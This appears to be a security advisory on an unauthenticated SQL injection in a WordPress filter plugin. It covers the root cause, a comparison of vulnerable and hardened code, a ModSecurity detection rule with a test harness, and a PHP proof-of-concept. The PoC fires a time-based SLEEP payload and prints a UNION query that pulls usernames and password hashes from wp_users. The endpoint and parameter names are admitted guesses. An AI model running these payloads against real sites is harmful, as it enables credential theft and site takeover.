Atomic Edge analysis of CVE-2026-54843 (metadata-based): This vulnerability allows unauthenticated attackers to perform SQL injection against the MDTF – Meta Data and Taxonomies Filter plugin for WordPress, version 1.3.7 and earlier. The CVSS score is 7.5 (High), with network attack vector, low complexity, and no authentication required. The impact is limited to confidentiality (high), with no impact on integrity or availability.
Atomic Edge research infers the root cause from the CWE-89 classification and the vulnerability description. The plugin fails to properly escape user-supplied parameters and does not use prepared statements when building SQL queries. This is a classic SQL injection vulnerability where attacker-controlled input is concatenated directly into SQL statements. Since no code diff is available, Atomic Edge analysis cannot confirm the exact parameter or query structure, but the CWE description strongly suggests the plugin uses $wpdb->query() or $wpdb->get_results() with unsanitized input rather than $wpdb->prepare().
Exploitation is likely achieved through the plugin's AJAX or REST endpoints used for filtering. Based on the plugin slug 'wp-meta-data-filter-and-taxonomy-filter', the vulnerable action is likely 'mdf_filter_data' or similar. An unauthenticated attacker sends a POST request to /wp-admin/admin-ajax.php with action=mdf_filter_data and a malicious SQL payload in one of the filter parameters (e.g., meta_key, meta_value, or tax_query). The attacker uses UNION-based or time-based blind SQL injection techniques to extract database contents. Example payloads include ' UNION SELECT user_pass FROM wp_users-- or sleep(5) in the parameter value.
Remediation requires the vendor to use parameterized queries (prepared statements) with $wpdb->prepare() for all database operations. The plugin must escape all user-supplied parameters using esc_sql() or pass them as placeholder values in prepared statements. Atomic Edge recommends updating to version 1.3.8 or higher immediately.
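The root-cause and remediation paragraphs above describe the CWE-89 pattern in general terms. The following is an added example, not the MDTF plugin's code and not Atomic Edge's: a hypothetical WordPress AJAX filter handler written first in the concatenation pattern the advisory describes, then hardened with $wpdb->prepare(). The function names, the action name 'mdtf_example_filter', the use of the postmeta table and the allowlisted columns are all assumptions made for the example.

```php
<?php
// Added example (not the MDTF plugin's code): a hypothetical AJAX filter
// handler, first in the CWE-89 pattern the advisory describes, then hardened.
// Function names, the action name and the postmeta query are assumptions.

// VULNERABLE pattern: request values are concatenated into the statement text,
// so a quote character in meta_key or meta_value changes the query's structure.
function mdtf_example_filter_vulnerable() {
	global $wpdb;
	$meta_key   = $_POST['meta_key'] ?? '';
	$meta_value = $_POST['meta_value'] ?? '';
	$sql = "SELECT post_id FROM {$wpdb->postmeta}
	        WHERE meta_key = '$meta_key' AND meta_value = '$meta_value'";
	wp_send_json_success( $wpdb->get_col( $sql ) );
}

// HARDENED: values are passed as %s placeholders, so the SQL text never changes.
// With $wpdb->prepare() the placeholders are written without surrounding quotes;
// prepare() quotes and escapes the string arguments itself.
function mdtf_example_filter_hardened() {
	global $wpdb;
	$meta_key   = sanitize_text_field( wp_unslash( $_POST['meta_key'] ?? '' ) );
	$meta_value = sanitize_text_field( wp_unslash( $_POST['meta_value'] ?? '' ) );
	if ( '' === $meta_key ) {
		wp_send_json_error( 'meta_key is required', 400 );
	}
	$sql = $wpdb->prepare(
		"SELECT post_id FROM {$wpdb->postmeta} WHERE meta_key = %s AND meta_value = %s",
		$meta_key,
		$meta_value
	);
	wp_send_json_success( array_map( 'intval', $wpdb->get_col( $sql ) ) );
}

// Identifiers (a column to ORDER BY, a sort direction) cannot be bound with %s
// and esc_sql() is not meant for them: validate against a fixed allowlist.
function mdtf_example_orderby( $requested ) {
	$allowed = array( 'post_id', 'meta_value' ); // assumed allowlist
	return in_array( $requested, $allowed, true ) ? $requested : 'post_id';
}

// Only the hardened handler is registered; nopriv covers unauthenticated callers,
// which is the path this CVE is reachable from.
add_action( 'wp_ajax_mdtf_example_filter', 'mdtf_example_filter_hardened' );
add_action( 'wp_ajax_nopriv_mdtf_example_filter', 'mdtf_example_filter_hardened' );
```

The hardened handler keeps the sanitize_text_field() step for input hygiene, but the property that closes CWE-89 is that the query text is fixed and the values are bound; escaping alone (esc_sql()) only covers string literals, which is why the identifier case uses an allowlist instead.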
The impact of successful exploitation is severe: an attacker can extract sensitive information from the WordPress database, including user credentials (hashed passwords), email addresses, session tokens, and potentially configuration data. This can lead to account takeover and further compromise of the WordPress site.
Here you will find our ModSecurity-compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-54843 (metadata-based)
# Block unauthenticated SQL injection attempts against MDTF plugin AJAX handler
# Notes: REQUEST_URI includes any query string, so @streq matches only requests
# with no query string (REQUEST_FILENAME would match regardless). ARGS_POST is
# already URL-decoded once by ModSecurity; t:urlDecode handles double encoding
# and runs before t:lowercase so decoded letters are lowercased too. Only the
# meta_key argument is inspected by the final chained rule.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" \
    "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-54843 MDTF SQL Injection Attempt Detected',severity:'CRITICAL',tag:'CVE-2026-54843'"
    SecRule ARGS_POST:action "@streq mdf_filter_data" "chain"
        SecRule ARGS_POST:meta_key "@rx (\bunion\b.*\bselect\b|\bsleep\b\(|\bbenchmark\b\(|\bwaitfor\b|\bpg_sleep\b|\bselect\b.*\bfrom\b.*\bfrom\b|'\s*or\s*'1'='1|'\s*and\s*'1'='1)" \
            "t:urlDecode,t:lowercase"
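To check the rule above before deploying it, the same PCRE pattern can be run offline against the argument values the chained rule would see. The following is an added example, not Atomic Edge's rule file: a small PHP harness that mirrors the three-stage chain (URI, action, then the meta_key regex with urlDecode and lowercase applied) over constructed request values. The helper names and the sample values are constructed for this example; the harness assumes the argument value is given as ModSecurity presents it, i.e. already URL-decoded once.

```php
<?php
// Added example (not Atomic Edge's rule file): the WAF rule's @rx pattern run
// through preg_match() with the rule's transformations (urlDecode, then
// lowercase), to verify what the chained rule blocks and what it lets through.
// Helper names and the sample request values below are constructed.

$mdtf_sqli_pattern = <<<'RX'
/(\bunion\b.*\bselect\b|\bsleep\b\(|\bbenchmark\b\(|\bwaitfor\b|\bpg_sleep\b|\bselect\b.*\bfrom\b.*\bfrom\b|'\s*or\s*'1'='1|'\s*and\s*'1'='1)/
RX;

// Apply the rule's transformation chain to one argument value.
function mdtf_rule_normalize( string $value ): string {
	return strtolower( urldecode( $value ) );
}

// Mirror the chain: URI match, then action match, then the meta_key regex.
// Returns true when the request would be denied with status 403.
function mdtf_rule_blocks( string $uri, array $post, string $pattern ): bool {
	if ( $uri !== '/wp-admin/admin-ajax.php' ) {
		return false;
	}
	if ( ( $post['action'] ?? '' ) !== 'mdf_filter_data' ) {
		return false;
	}
	$value = mdtf_rule_normalize( $post['meta_key'] ?? '' );
	return preg_match( $pattern, $value ) === 1;
}

// Constructed cases: [uri, POST fields, expected decision].
$cases = array(
	// ordinary filter value: must not be blocked
	array( '/wp-admin/admin-ajax.php', array( 'action' => 'mdf_filter_data', 'meta_key' => '_price' ), false ),
	// the time-based payload from the advisory: blocked via \bsleep\b\(
	array( '/wp-admin/admin-ajax.php', array( 'action' => 'mdf_filter_data', 'meta_key' => "1' AND (SELECT 1234 FROM (SELECT(SLEEP(3)))a) AND '1'='1" ), true ),
	// double-encoded tautology: t:urlDecode exposes ' or '1'='1
	array( '/wp-admin/admin-ajax.php', array( 'action' => 'mdf_filter_data', 'meta_key' => '%27%20OR%20%271%27%3D%271' ), true ),
	// different action: the chain stops at stage two
	array( '/wp-admin/admin-ajax.php', array( 'action' => 'other_action', 'meta_key' => 'sleep(5)' ), false ),
	// a word containing "select" and "from" without word boundaries: not blocked
	array( '/wp-admin/admin-ajax.php', array( 'action' => 'mdf_filter_data', 'meta_key' => 'product_select_from_from' ), false ),
);

foreach ( $cases as list( $uri, $post, $expected ) ) {
	$got = mdtf_rule_blocks( $uri, $post, $mdtf_sqli_pattern );
	printf( "%s action=%-16s meta_key=%-45s %s\n",
		$got === $expected ? 'ok  ' : 'FAIL',
		$post['action'],
		$post['meta_key'],
		$got ? 'blocked' : 'allowed'
	);
}
```

Running it prints one line per case with "ok" when the harness agrees with the expected decision; the last two cases show that the rule is scoped to the single action name and that the \b boundaries keep ordinary identifiers containing SQL keywords from being blocked.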
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-54843 - MDTF – Meta Data and Taxonomies Filter <= 1.3.7 - Unauthenticated SQL Injection
$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress URL
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
// Step 1: Test for basic SQL injection detection (error-based or time-based)
// The plugin likely uses an action like 'mdf_filter_data' for filter processing
// We inject a time-based payload to confirm vulnerability without causing damage
$payload = "1' AND (SELECT 1234 FROM (SELECT(SLEEP(3)))a) AND '1'='1";
$post_data = array(
'action' => 'mdf_filter_data',
'meta_key' => $payload
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);
curl_close($ch);
$execution_time = $end_time - $start_time;
echo "[Atomic Edge] Testing CVE-2026-54843 on $target_url\n";
if ($execution_time >= 3) {
echo "[VULNERABLE] SQL injection confirmed: time-based payload caused delay of " . round($execution_time, 2) . " seconds.\n";
echo "[INFO] Extract data using UNION-based injection: http://example.com/wp-admin/admin-ajax.php?action=mdf_filter_data&meta_key=1' UNION SELECT user_login,user_pass FROM wp_users-- -\n";
} else {
echo "[NOT VULNERABLE OR DIFFERENT PARAMETER] Execution time: " . round($execution_time, 2) . " seconds.\n";
echo "[INFO] Try alternative parameters: meta_value, tax_query, term_id, post_type\n";
}
?>